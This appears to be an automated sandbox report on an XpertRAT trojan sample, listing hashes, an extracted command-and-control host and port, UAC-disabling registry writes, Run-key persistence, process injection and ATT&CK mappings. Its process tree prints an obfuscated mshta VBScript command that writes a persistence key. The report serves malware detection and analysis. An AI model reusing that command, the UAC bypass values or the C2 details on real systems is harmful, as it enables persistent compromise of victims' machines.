Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
27/01/2025, 13:28
Static task
static1
Behavioral task
behavioral1
Sample
2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe
Resource
win10v2004-20241007-en
General
-
Target
2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe
-
Size
744KB
-
MD5
6c6a9c70763f799ac9d4ca55a292c3f4
-
SHA1
af4ebcfdd1624a077cd0f1a1c77f04076a974714
-
SHA256
2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17
-
SHA512
d21fc33c06169f58735333d95455636dfe0054021c884fa01df846d4bf0fd1085982475f47b0aba26ba782d66ce10317eadc34c6d3a28f8bd458c2ffda6231fc
-
SSDEEP
12288:VzukkVr/MhE6JOA6lfHcb+L1LkUrzx0E+qKlR5yaMxTEaD:NhE6JOAiPVgUrCvR5yaMxTEaD
Malware Config
Extracted
xpertrat
3.1.9
Group
joeing.dnsfor.me:2011
P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5
Signatures
-
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" OPHAVSRETTEN.exe -
Windows security bypass 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UACDisableNotify = "0" OPHAVSRETTEN.exe -
XpertRAT Core payload 3 IoCs
resource yara_rule behavioral2/memory/1360-22-0x0000000000400000-0x0000000000444000-memory.dmp xpertrat behavioral2/memory/1360-24-0x0000000000400000-0x0000000000444000-memory.dmp xpertrat behavioral2/memory/1360-35-0x0000000000400000-0x0000000000444000-memory.dmp xpertrat -
Xpertrat family
-
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run OPHAVSRETTEN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 = "C:\\Users\\Admin\\AppData\\Roaming\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5.exe" OPHAVSRETTEN.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation 2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe -
Executes dropped EXE 3 IoCs
pid Process 4424 OPHAVSRETTEN.exe 456 OPHAVSRETTEN.exe 1360 OPHAVSRETTEN.exe -
Windows security modification 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UACDisableNotify = "0" OPHAVSRETTEN.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 = "C:\\Users\\Admin\\AppData\\Roaming\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5.exe" OPHAVSRETTEN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 = "C:\\Users\\Admin\\AppData\\Roaming\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5.exe" OPHAVSRETTEN.exe -
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" OPHAVSRETTEN.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4424 set thread context of 456 4424 OPHAVSRETTEN.exe 85 PID 456 set thread context of 1360 456 OPHAVSRETTEN.exe 86 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OPHAVSRETTEN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OPHAVSRETTEN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OPHAVSRETTEN.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 456 OPHAVSRETTEN.exe 456 OPHAVSRETTEN.exe 456 OPHAVSRETTEN.exe 456 OPHAVSRETTEN.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1360 OPHAVSRETTEN.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 4104 2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe 4424 OPHAVSRETTEN.exe 456 OPHAVSRETTEN.exe 1360 OPHAVSRETTEN.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 4104 wrote to memory of 2372 4104 2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe 83 PID 4104 wrote to memory of 2372 4104 2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe 83 PID 4104 wrote to memory of 2372 4104 2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe 83 PID 4104 wrote to memory of 4424 4104 2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe 84 PID 4104 wrote to memory of 4424 4104 2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe 84 PID 4104 wrote to memory of 4424 4104 2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe 84 PID 4424 wrote to memory of 456 4424 OPHAVSRETTEN.exe 85 PID 4424 wrote to memory of 456 4424 OPHAVSRETTEN.exe 85 PID 4424 wrote to memory of 456 4424 OPHAVSRETTEN.exe 85 PID 4424 wrote to memory of 456 4424 OPHAVSRETTEN.exe 85 PID 4424 wrote to memory of 456 4424 OPHAVSRETTEN.exe 85 PID 4424 wrote to memory of 456 4424 OPHAVSRETTEN.exe 85 PID 4424 wrote to memory of 456 4424 OPHAVSRETTEN.exe 85 PID 4424 wrote to memory of 456 4424 OPHAVSRETTEN.exe 85 PID 4424 wrote to memory of 456 4424 OPHAVSRETTEN.exe 85 PID 456 wrote to memory of 1360 456 OPHAVSRETTEN.exe 86 PID 456 wrote to memory of 1360 456 OPHAVSRETTEN.exe 86 PID 456 wrote to memory of 1360 456 OPHAVSRETTEN.exe 86 PID 456 wrote to memory of 1360 456 OPHAVSRETTEN.exe 86 PID 456 wrote to memory of 1360 456 OPHAVSRETTEN.exe 86 PID 456 wrote to memory of 1360 456 OPHAVSRETTEN.exe 86 PID 456 wrote to memory of 1360 456 OPHAVSRETTEN.exe 86 PID 456 wrote to memory of 1360 456 OPHAVSRETTEN.exe 86 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" OPHAVSRETTEN.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe"C:\Users\Admin\AppData\Local\Temp\2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript:Execute(" str1 = ""WScript.Shell"" : str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : execute str2 : myKey = ""HKCU\Software\Microsoft\Windows\:\Run\sprgekasser"" : myKey = ""HKCU\Software\Microsoft\Windows\X\Run\NOME"" : myKey=replace(myKey,"":"",""CurrentVersion"") : WshShell.RegWrite myKey,""C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe"",""REG_SZ"" : window.close")2⤵
- System Location Discovery: System Language Discovery
PID:2372
-
-
C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe"C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe"C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe"3⤵
- UAC bypass
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:456 -
C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exeC:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe4⤵
- Adds policy Run key to start application
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1360
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
3Disable or Modify Tools
3Modify Registry
6Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
744KB
MD541116a2b3b3b0b088a773d7daa201e45
SHA1c10e2a5e1f5278cb32772df1991d3a25dc2eeea8
SHA2561ca110ac8fc54b08f016111bacb5590e7df1d00b10638a1e3690453630505c58
SHA512dae78fd971904bcfc4e59f52be1caa7b6745c82f17b3beba727cd2b021babd72d2e8118b42e8ca697a383251e0c6e0e6560153e143cc6219e7ad7d9a0798270b